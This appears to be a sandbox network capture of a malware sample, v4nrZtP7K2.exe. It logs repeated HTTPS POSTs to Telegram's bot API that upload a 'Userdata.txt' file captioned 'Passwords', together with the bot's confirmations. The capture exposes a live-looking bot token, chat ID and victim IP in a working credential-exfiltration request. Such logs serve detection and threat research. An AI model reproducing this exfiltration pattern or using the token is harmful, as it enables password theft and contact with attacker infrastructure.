                                                                                    2025-01-10 20:41:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 39 62 32 63 66 39 65 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd3279b2cf9e25Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:37 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:37 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:37 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44665,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541697,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.949890149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:38 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd328f4fe8732c
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 66 34 66 65 38 37 33 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd328f4fe8732cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:39 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:39 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44667,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541698,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.949905149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:40 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32a4dc55bf1d
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 34 64 63 35 35 62 66 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32a4dc55bf1dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:40 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:40 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:40 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44669,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541700,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.949919149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:42 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32bd0647d8c6
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 64 30 36 34 37 64 38 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32bd0647d8c6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:42 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:42 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:42 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44671,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541702,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.949930149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:44 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32d26ef83989
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 32 36 65 66 38 33 39 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32d26ef83989Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:44 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:44 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44673,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541704,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.949946149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:46 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32ed1900c427
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 64 31 39 30 30 63 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32ed1900c427Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:47 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:46 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:47 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44676,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541706,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.949962149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:49 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd330e4767d75a
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 65 34 37 36 37 64 37 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd330e4767d75aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:49 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:49 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:49 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44678,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541709,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.949973149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:51 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd33221c009098
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
